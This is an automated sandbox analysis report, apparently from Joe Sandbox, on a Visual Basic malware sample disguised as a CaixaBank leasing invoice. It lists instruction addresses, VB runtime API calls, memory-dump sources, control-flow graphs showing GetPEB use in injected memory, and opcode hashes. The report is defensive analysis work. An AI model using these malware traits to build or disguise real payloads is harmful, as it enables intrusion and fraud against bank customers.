        0x0040b831
        0x0040b857
        0x0040b861
        0x0040b865
        0x0040b86a
        0x0040b885
        0x0040b88b
        0x0040b88d
        0x0040b89a
        0x0040b8bf
        0x0040b89c
        0x0040b89c
        0x0040b8a1
        0x0040b8a6
        0x0040b8ac
        0x0040b8b2
        0x0040b8b7
        0x0040b8b7
        0x0040b8cc
        0x0040b8d5
        0x0040b8db
        0x0040b8e5
        0x0040b8e8
        0x0040b905
        0x0040b914
        0x0040b91a
        0x0040b927
        0x0040b949
        0x0040b929
        0x0040b929
        0x0040b92e
        0x0040b933
        0x0040b936
        0x0040b93c
        0x0040b941
        0x0040b941
        0x0040b956
        0x0040b963
        0x0040b968
        0x0040b96e
        0x0040b97b
        0x0040b981
        0x0040b983
        0x0040b990
        0x0040b9b2
        0x0040b992
        0x0040b992
        0x0040b997
        0x0040b99c
        0x0040b99f
        0x0040b9a5
        0x0040b9aa
        0x0040b9aa
        0x0040b9b9
        0x0040b9c3
        0x0040b9cd
        0x0040b9e5
        0x0040b9fb
        0x0040ba18
        0x0040b9fd
        0x0040b9fd
        0x0040ba02
        0x0040ba07
        0x0040ba0c
        0x0040ba0c
        0x0040ba3c
        0x0040ba40
        0x0040ba45
        0x0040ba5d
        0x0040ba63
        0x0040ba65
        0x0040ba72
        0x0040ba97
        0x0040ba74
        0x0040ba74
        0x0040ba79
        0x0040ba7e
        0x0040ba84
        0x0040ba8a
        0x0040ba8f
        0x0040ba8f
        0x0040baa5
        0x0040bac2
        0x0040baa7
        0x0040baa7
        0x0040baac
        0x0040bab1
        0x0040bab6
        0x0040bab6
        0x0040badc
        0x0040bae6
        0x0040baea
        0x0040baef
        0x0040bb0a
        0x0040bb10
        0x0040bb12
        0x0040bb1f
        0x0040bb44
        0x0040bb21
        0x0040bb21
        0x0040bb26
        0x0040bb2b
        0x0040bb31
        0x0040bb37
        0x0040bb3c
        0x0040bb3c
        0x0040bb51
        0x0040bb5a
        0x0040bb60
        0x0040bb6a
        0x0040bb6d
        0x0040bb8a
        0x0040bb99
        0x0040bb9f
        0x0040bbac
        0x0040bbce
        0x0040bbae
        0x0040bbae
        0x0040bbb3
        0x0040bbb8
        0x0040bbbb
        0x0040bbc1
        0x0040bbc6
        0x0040bbc6
        0x0040bbdb
        0x0040bbe1
        0x0040bbe5
        0x0040bbe6
        0x0040bbe8
        0x0040bbed
        0x0040bbf3
        0x0040bbff
        0x0040bc1c
        0x0040bc01
        0x0040bc01
        0x0040bc06
        0x0040bc0b
        0x0040bc10
        0x0040bc10
        0x0040bc40
        0x0040bc44
        0x0040bc49
        0x0040bc64
        0x0040bc67
        0x0040bc69
        0x0040bc76
        0x0040bc98
        0x0040bc78
        0x0040bc78
        0x0040bc7a
        0x0040bc7f
        0x0040bc85
        0x0040bc8b
        0x0040bc90
        0x0040bc90
        0x0040bca6
        0x0040bcc3
        0x0040bca8
        0x0040bca8
        0x0040bcad
        0x0040bcb2
        0x0040bcb7
        0x0040bcb7
        0x0040bce7
        0x0040bceb
        0x0040bcf0
        0x0040bd0b
        0x0040bd11
        0x0040bd13
        0x0040bd20
        0x0040bd45
        0x0040bd22
        0x0040bd22
        0x0040bd27
        0x0040bd2c
        0x0040bd32
        0x0040bd38
        0x0040bd3d
        0x0040bd3d
        0x0040bd52
        0x0040bd72
        0x0040bd78
        0x0040bd85
        0x0040bda7
        0x0040bd87
        0x0040bd87
        0x0040bd8c
        0x0040bd91
        0x0040bd94
        0x0040bd9a
        0x0040bd9f
        0x0040bd9f
        0x0040bdb1
        0x0040bdb5
        0x0040bdb6
        0x0040bdb8
        0x0040bdbd
        0x0040bdc7
        0x0040bde4
        0x0040bdc9
        0x0040bdc9
        0x0040bdce
        0x0040bdd3
        0x0040bdd8
        0x0040bdd8
        0x0040be08
        0x0040be0c
        0x0040be11
        0x0040be2c
        0x0040be32
        0x0040be34
        0x0040be41
        0x0040be66
        0x0040be43
        0x0040be43
        0x0040be48
        0x0040be4d
        0x0040be53
        0x0040be59
        0x0040be5e
        0x0040be5e
        0x0040be74
        0x0040be91
        0x0040be76
        0x0040be76
        0x0040be7b
        0x0040be80
        0x0040be85
        0x0040be85
        0x0040beb5
        0x0040beb9
        0x0040bebe
        0x0040bed9
        0x0040bedf
        0x0040bee1
        0x0040beee
        0x0040bf13
        0x0040bef0
        0x0040bef0
        0x0040bef5
        0x0040befa
        0x0040bf00
        0x0040bf06
        0x0040bf0b
        0x0040bf0b
        0x0040bf21
        0x0040bf3e
        0x0040bf23
        0x0040bf23
        0x0040bf28
        0x0040bf2d
        0x0040bf32
        0x0040bf32
        0x0040bf58
        0x0040bf62
        0x0040bf66
        0x0040bf6b
        0x0040bf83
        0x0040bf89
        0x0040bf8b
        0x0040bf98
        0x0040bfbd
        0x0040bf9a
        0x0040bf9a
        0x0040bf9f
        0x0040bfa4
        0x0040bfaa
        0x0040bfb0
        0x0040bfb5
        0x0040bfb5
        0x0040bfc7
        0x0040bfcd
        0x0040bfd7
        0x0040bfda
        0x0040bfe7
        0x0040bff3
        0x0040bff9
        0x0040c003
        0x0040c020
        0x0040c04a
        0x0040c04f
        0x0040c055
        0x0040c057
        0x0040c058
        0x0040c059
        0x0040c05a
        0x0040c063
        0x0040c069
        0x0040c076
        0x0040c098
        0x0040c078
        0x0040c078
        0x0040c07d
        0x0040c082
        0x0040c085
        0x0040c08b
        0x0040c090
        0x0040c090
        0x0040c0a5
        0x0040c0ab
        0x0040c0af
        0x0040c0b3
        0x0040c0b4
        0x0040c0b6
        0x0040c0bb
        0x0040c0c1
        0x0040b9d6
        0x0040b9dc
        0x0040c146
        0x0040c14e
        0x0040c15d
        0x0040c169
        0x0040c171
        0x0040c174
        0x0040c17b
        0x0040c18a
        0x0040c194
        0x0040c1ae
        0x0040c196
        0x0040c196
        0x0040c19b
        0x0040c1a0
        0x0040c1a5
        0x0040c1a5
        0x0040c1c9
        0x0040c1cd
        0x0040c1d2
        0x0040c1e1
        0x0040c1e7
        0x0040c1e9
        0x0040c1f0
        0x0040c20c
        0x0040c1f2
        0x0040c1f2
        0x0040c1f7
        0x0040c1fc
        0x0040c1ff
        0x0040c202
        0x0040c207
        0x0040c207
        0x0040c213
        0x0040c216
        0x0040c21d
        0x0040c220
        0x0040c221
        0x0040c231
        0x0040c238
        0x0040c240
        0x0040c245
        0x0040c24b
        0x0040c4cd
        0x0040c4cd
        0x0040c4ce
        0x00000000
        0x0040c251
        0x0040c258
        0x0040c272
        0x0040c25a
        0x0040c25a
        0x0040c25f
        0x0040c264
        0x0040c269
        0x0040c269
        0x0040c28d
        0x0040c291
        0x0040c296
        0x0040c2a5
        0x0040c2ab
        0x0040c2ad
        0x0040c2b4
        0x0040c2d0
        0x0040c2b6
        0x0040c2b6
        0x0040c2bb
        0x0040c2c0
        0x0040c2c3
        0x0040c2c6
        0x0040c2cb
        0x0040c2cb
        0x0040c2db
        0x0040c2f8
        0x0040c2dd
        0x0040c2dd
        0x0040c2e2
        0x0040c2e7
        0x0040c2ec
        0x0040c2ec
        0x0040c31c
        0x0040c320
        0x0040c325
        0x0040c334
        0x0040c33a
        0x0040c33c
        0x0040c343
        0x0040c362
        0x0040c345
        0x0040c345
        0x0040c34a
        0x0040c34f
        0x0040c352
        0x0040c355
        0x0040c35a
        0x0040c35a
        0x0040c369
        0x0040c36b
        0x0040c36d
        0x0040c373
        0x0040c374
        0x0040c379
        0x0040c383
        0x0040c3a0
        0x0040c385
        0x0040c385
        0x0040c38a
        0x0040c38f
        0x0040c394
        0x0040c394
        0x0040c3ba
        0x0040c3c4
        0x0040c3c8
        0x0040c3cd
        0x0040c3dc
        0x0040c3df
        0x0040c3e1
        0x0040c3e8
        0x0040c404
        0x0040c3ea
        0x0040c3ea
        0x0040c3ec
        0x0040c3f1
        0x0040c3f4
        0x0040c3f7
        0x0040c3fc
        0x0040c3fc
        0x0040c411
        0x0040c417
        0x0040c41e
        0x0040c421
        0x0040c424
        0x0040c42a
        0x0040c431
        0x0040c434
        0x0040c438
        0x0040c43d
        0x0040c443
        0x0040c449
        0x0040c44f
        0x0040c456
        0x0040c459
        0x0040c45c
        0x0040c469
        0x0040c476
        0x0040c47c
        0x0040c47e
        0x0040c485
        0x0040c4a4
        0x0040c487
        0x0040c487
        0x0040c48c
        0x0040c491
        0x0040c494
        0x0040c497
        0x0040c49c
        0x0040c49c
        0x0040c4ae
        0x0040c4b2
        0x0040c4b6
        0x0040c4b7
        0x0040c4ba
        0x0040c4bb
        0x0040c4bd
        0x0040c4c8
        0x00000000
        0x0040c4c8
        0x0040b9e2
        0x0040b9e2
        0x00000000
        0x0040b9e2
        0x00000000
        0x0040b9dc
        0x0040c0d8
        0x0040c0da
        0x0040c119
        0x0040c121
        0x0040c126

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040A7E2
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402AA8,00000218), ref: 0040A86F
        • __vbaChkstk.MSVBVM60(00000000,00401158,00402AA8,00000218), ref: 0040A886
        • __vbaChkstk.MSVBVM60(00000000,00401158,00402AA8,00000218), ref: 0040A89A
        • __vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 0040A8B9
        • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00401246), ref: 0040A8C2
        • __vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00401246), ref: 0040A8CC
        • __vbaFreeObj.MSVBVM60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00401246), ref: 0040A8D4
        • __vbaFreeVar.MSVBVM60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00401246), ref: 0040A8DC
        • __vbaChkstk.MSVBVM60 ref: 0040A8F8
        • __vbaLateMemSt.MSVBVM60(00000000,Left), ref: 0040A911
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,00000000,Left), ref: 0040A929
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040A962
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CB4,00000110), ref: 0040A9AF
        • __vbaChkstk.MSVBVM60(00000000,?,00402CB4,00000110), ref: 0040A9DE
        • __vbaLateMemSt.MSVBVM60(00000000,Top), ref: 0040A9F7
        • __vbaFreeObj.MSVBVM60(00000000,Top), ref: 0040A9FF
        • __vbaChkstk.MSVBVM60(00000000,Top), ref: 0040AA18
        • __vbaLateMemSt.MSVBVM60(00000000,Visible,00000000,Top), ref: 0040AA31
        • __vbaLateMemCallLd.MSVBVM60(?,00000000,Enabled,00000000,00000000,Visible,00000000,Top), ref: 0040AA55
        • __vbaVarTstNe.MSVBVM60(?,00000000,?,00000000,00000000,00000000), ref: 0040AA65
        • __vbaFreeVar.MSVBVM60(?,00000000,?,00000000,00000000,00000000), ref: 0040AA74
        • __vbaNew2.MSVBVM60(00402D0C,0040EB0C,?,00000000,?,00000000,00000000,00000000), ref: 0040AA9B
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CFC,0000001C), ref: 0040AAFD
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D1C,00000050), ref: 0040AB4F
        • __vbaFreeObj.MSVBVM60(00000000,?,00402D1C,00000050), ref: 0040AB66
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,00000000,?,00000000,00000000,00000000), ref: 0040AB7E
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040ABB7
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D2C,00000160), ref: 0040AC04
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402ADC,000006F8), ref: 0040AC70
        • __vbaFreeObj.MSVBVM60(00000000,00401158,00402ADC,000006F8), ref: 0040AC87
        • __vbaFreeVar.MSVBVM60(00000000,00401158,00402ADC,000006F8), ref: 0040AC8F
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040ACA7
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040ACE0
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CB4,00000050), ref: 0040AD24
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402ADC,000006FC,?,?,?,00000003,?,24EF09A0,0043B490,?), ref: 0040AE05
        • __vbaFreeObj.MSVBVM60(?,?,?,00000003,?,24EF09A0,0043B490,?), ref: 0040AE27
        • __vbaFreeVarList.MSVBVM60(00000002,00000008,00000003,?,?,?,00000003,?,24EF09A0,0043B490,?), ref: 0040AE36
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402ADC,00000700), ref: 0040AE75
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040AEA7
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040AEE0
        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402D3C,00000160), ref: 0040AF2D
        • __vbaChkstk.MSVBVM60(000055ED,?,?,D890FFC0,00005B07,?,?), ref: 0040AF97
        • __vbaVarMove.MSVBVM60(?,?,D890FFC0,00005B07,?,?), ref: 0040AFC3
        • __vbaFreeObj.MSVBVM60(?,?,D890FFC0,00005B07,?,?), ref: 0040AFCB
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,?,D890FFC0,00005B07,?,?), ref: 0040AFE3
        • __vbaObjSet.MSVBVM60(00000000,00000000,?,?,D890FFC0,00005B07,?,?), ref: 0040B01C
        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402D4C,00000158,?,?,D890FFC0,00005B07,?,?), ref: 0040B069
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,?,D890FFC0,00005B07,?,?), ref: 0040B090
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,D890FFC0,00005B07,?,?), ref: 0040B0C9
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D4C,000001A0,?,?,D890FFC0,00005B07,?,?), ref: 0040B116
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,?,D890FFC0,00005B07,?,?), ref: 0040B13D
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,D890FFC0,00005B07,?,?), ref: 0040B176
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CB4,00000108,?,?,D890FFC0,00005B07,?,?), ref: 0040B1C0
        • __vbaChkstk.MSVBVM60(?,DD379050,00005AFA,?,?,?,?,?,00000008,?,?,?,D890FFC0,00005B07,?,?), ref: 0040B25A
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402ADC,00000704,?,?,00000008,?,?,?,D890FFC0,00005B07,?,?), ref: 0040B29B
        • __vbaFreeObjList.MSVBVM60(00000003,00000000,?,?,?,?,00000008,?,?,?,D890FFC0,00005B07,?,?), ref: 0040B2C6
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00000000), ref: 0040B2D1
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,?,?,?,?,?,00000000), ref: 0040B2E9
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040B322
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CB4,00000078), ref: 0040B369
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040B390
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040B3C9
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D3C,000000E0), ref: 0040B416
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040B43D
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040B476
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CB4,00000130), ref: 0040B4C0
        • __vbaFreeObjList.MSVBVM60(00000003,00000000,?,?,?,?,?,?,3151D390,?,00000009,007A0394,?,?), ref: 0040B597
        • __vbaFreeVar.MSVBVM60 ref: 0040B5A2
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040B5BA
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040B5F3
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D5C,00000068), ref: 0040B63A
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040B661
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040B69A
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CB4,00000138), ref: 0040B6E7
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402ADC,00000708), ref: 0040B749
        • __vbaFreeObjList.MSVBVM60(00000002,00000000,?), ref: 0040B767
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040B782
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040B7BB
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D3C,00000140), ref: 0040B805
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040B82C
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040B865
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D4C,00000080), ref: 0040B8B2
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402ADC,0000070C,?,?,?,?), ref: 0040B93C
        • __vbaFreeObjList.MSVBVM60(00000002,00000000,?,?,?,?,?), ref: 0040B963
        • __vbaFreeVar.MSVBVM60 ref: 0040B96E
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00402AA8,000002B4), ref: 0040B9A5
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040BA07
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040BA40
        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402D3C,00000140), ref: 0040BA8A
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040BAB1
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BAEA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$CheckHresult$FreeNew2$Chkstk$LateList$Call$AddrefMove
        • String ID: Add$Enabled$Left$Top$VB.PictureBox$Vagabondiser$Visible$C
        • API String ID: 4257037141-1660072218
        • Opcode ID: 5e7c5fb5cf5bf5598f804a59b061cf766985ceda5211dc16ef3fcc4d42011ceb
        • Instruction ID: b841e788a40313e41bc21c5a611c98100fc90a97fbc68ea568cfdfc26bb067d7
        • Opcode Fuzzy Hash: 5e7c5fb5cf5bf5598f804a59b061cf766985ceda5211dc16ef3fcc4d42011ceb
        • Instruction Fuzzy Hash: 40E2F470940229DFDB20DF91CC49FEDB7B4BB08304F1084EAE549BB2A1D7B95A949F58
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 475 20f1c89-20f1d05 479 20f050b-20f0520 call 20f04b6 475->479 480 20f1d0b-20f1d15 475->480 482 20f1d17-20f1d24 480->482 482->482 484 20f1d26-20f1dc3 GetPEB call 20f5e34 482->484 490 20f1dc9-20f1e55 call 20f5e34 484->490 491 20f1c72-20f6169 call 20f1ca8 484->491 500 20f1eb7-20f1ec1 490->500 501 20f1e57-20f1e8c 490->501 499 20f616e 491->499 499->499 502 20f1ec7-20f1eca call 20f1ecf 500->502 503 20f4a24-20f4a5f 500->503 508 20f2a75-20f2a7a 503->508 509 20f4a65-20f4a9b 503->509 510 20f2a7b-20f2a8d 508->510 513 20f4b26-20f4b65 call 20f4b66 509->513 514 20f4aa1-20f4ae2 call 20f4def 509->514 510->510 512 20f2a8f-20f2aad 510->512 522 20f4ae4-20f4aff call 20f4def 514->522 523 20f4b10-20f4b23 call 20f4b66 514->523 522->523 529 20f4b01-20f4b0b call 20f4def 522->529 523->513 529->523
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID: 8K@
        • API String ID: 0-507234964
        • Opcode ID: fcd4ef051c9baac008a09c034daee7cc8dbe6350a80859d6fa53d869108ecb86
        • Instruction ID: d32debe15e47449e57cf104eb20f9e071ff55652287d1666f7d514a2bb0e8462
        • Opcode Fuzzy Hash: fcd4ef051c9baac008a09c034daee7cc8dbe6350a80859d6fa53d869108ecb86
        • Instruction Fuzzy Hash: F5216D35684305EEFB714E089D54BE6B7E6EF02B10F50426DEE49AB2D1D7B29840C512
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 531 20f1c87-20f1d05 535 20f050b-20f0520 call 20f04b6 531->535 536 20f1d0b-20f1d15 531->536 538 20f1d17-20f1d24 536->538 538->538 540 20f1d26-20f1dc3 GetPEB call 20f5e34 538->540 546 20f1dc9-20f1e55 call 20f5e34 540->546 547 20f1c72-20f6169 call 20f1ca8 540->547 556 20f1eb7-20f1ec1 546->556 557 20f1e57-20f1e8c 546->557 555 20f616e 547->555 555->555 558 20f1ec7-20f1eca call 20f1ecf 556->558 559 20f4a24-20f4a5f 556->559 564 20f2a75-20f2a7a 559->564 565 20f4a65-20f4a9b 559->565 566 20f2a7b-20f2a8d 564->566 569 20f4b26-20f4b65 call 20f4b66 565->569 570 20f4aa1-20f4ae2 call 20f4def 565->570 566->566 568 20f2a8f-20f2aad 566->568 578 20f4ae4-20f4aff call 20f4def 570->578 579 20f4b10-20f4b23 call 20f4b66 570->579 578->579 585 20f4b01-20f4b0b call 20f4def 578->585 579->569 585->579
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID: 8K@
        • API String ID: 0-507234964
        • Opcode ID: b98bf1bbae3fb929bc4f5c6124f50fe1779817cc88130599ed9cbe4050fa19e6
        • Instruction ID: aa0f727bfa1d62e7b580ba3bac1dd33ea02283b8bc747d1fc90c33291c828b67
        • Opcode Fuzzy Hash: b98bf1bbae3fb929bc4f5c6124f50fe1779817cc88130599ed9cbe4050fa19e6
        • Instruction Fuzzy Hash: 3E216A30784301DEFB750E088DA4BEAB7E2AF02B20F508159FE49AB5D1C7B5C840D541
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 587 20f1ceb-20f1d05 588 20f050b-20f0520 call 20f04b6 587->588 589 20f1d0b-20f1d15 587->589 591 20f1d17-20f1d24 589->591 591->591 593 20f1d26-20f1dc3 GetPEB call 20f5e34 591->593 599 20f1dc9-20f1e55 call 20f5e34 593->599 600 20f1c72-20f6169 call 20f1ca8 593->600 609 20f1eb7-20f1ec1 599->609 610 20f1e57-20f1e8c 599->610 608 20f616e 600->608 608->608 611 20f1ec7-20f1eca call 20f1ecf 609->611 612 20f4a24-20f4a5f 609->612 617 20f2a75-20f2a7a 612->617 618 20f4a65-20f4a9b 612->618 619 20f2a7b-20f2a8d 617->619 622 20f4b26-20f4b65 call 20f4b66 618->622 623 20f4aa1-20f4ae2 call 20f4def 618->623 619->619 621 20f2a8f-20f2aad 619->621 631 20f4ae4-20f4aff call 20f4def 623->631 632 20f4b10-20f4b23 call 20f4b66 623->632 631->632 638 20f4b01-20f4b0b call 20f4def 631->638 632->622 638->632
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID: 8K@
        • API String ID: 0-507234964
        • Opcode ID: 60940421b3aae4476bf81c7cc8715e81f346a12754793c896da4f856d14ed69f
        • Instruction ID: 86b30999a5a354b5e52337d65f0aee970dbd50652bcd24a70a5bdd13c639a624
        • Opcode Fuzzy Hash: 60940421b3aae4476bf81c7cc8715e81f346a12754793c896da4f856d14ed69f
        • Instruction Fuzzy Hash: C2218930684301DFFB754E088DA8BEAB7E2AF02B20F50416DFE49AB5D1D7B2C844D942
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 00aeab5485aa810d075e14f846813a47bc416d3c3b1f536c52c98a9a08d21c00
        • Instruction ID: 55ea573ca90c17e3df461be070c668cc05802062c1498d17a5672201171d10aa
        • Opcode Fuzzy Hash: 00aeab5485aa810d075e14f846813a47bc416d3c3b1f536c52c98a9a08d21c00
        • Instruction Fuzzy Hash: 8CF0547A45670D5E93819B5EE5044F6FBFCE301A407A053ABD185A1352EB273143863A
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f6b4ebac48c1afbb7d095d727ccfdd893189810d4af197f7d443776a5727af61
        • Instruction ID: 24c0edc597d8ba0689c5f6fe59adc1adec64935d677bd91f5ec97c7e5848d683
        • Opcode Fuzzy Hash: f6b4ebac48c1afbb7d095d727ccfdd893189810d4af197f7d443776a5727af61
        • Instruction Fuzzy Hash: 1DF089713903018FD796CA28D6C4F5B73A6AF64720F514465FB41C7A25F324DC40E611
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2192fb2fefb0807518894fbaa6604c2de0be94ca2e0aa7f5382c1f8ce0f50178
        • Instruction ID: 8fd6456540806abe84529c9d39d94e03bd53cf589a49164879cacba786f27c23
        • Opcode Fuzzy Hash: 2192fb2fefb0807518894fbaa6604c2de0be94ca2e0aa7f5382c1f8ce0f50178
        • Instruction Fuzzy Hash: 57E012713403018FD796DA14D6C4F5B7395AF55720B218555EB058B665F324EC40EA21
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a8e6990ffe0e1e0c87477a799eb98ece61bb384b1cadb61c96db37ce5a4e49ad
        • Instruction ID: 7c6ffe1290837cb9937f82e5ee1781bea3088751cadc93045a4ea6704a27a377
        • Opcode Fuzzy Hash: a8e6990ffe0e1e0c87477a799eb98ece61bb384b1cadb61c96db37ce5a4e49ad
        • Instruction Fuzzy Hash: 48C092B73429928FEB05EA08C891B4073B2FB34684BD409B0F443CBF51E328ED40CA00
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_20f0000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 63234b274eba7ecbfb2b94e1be8abb406ec4f1876ae3982983c9411603d22812
        • Instruction ID: 8f4fe6749d69c6c65e5a21458edb77f653d20df834e426e6cc2159a84c214850
        • Opcode Fuzzy Hash: 63234b274eba7ecbfb2b94e1be8abb406ec4f1876ae3982983c9411603d22812
        • Instruction Fuzzy Hash: B1C048307525808BC741CE08C280B8473A2AB41B80F9185A8E5818B9A6C329E9419A00
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
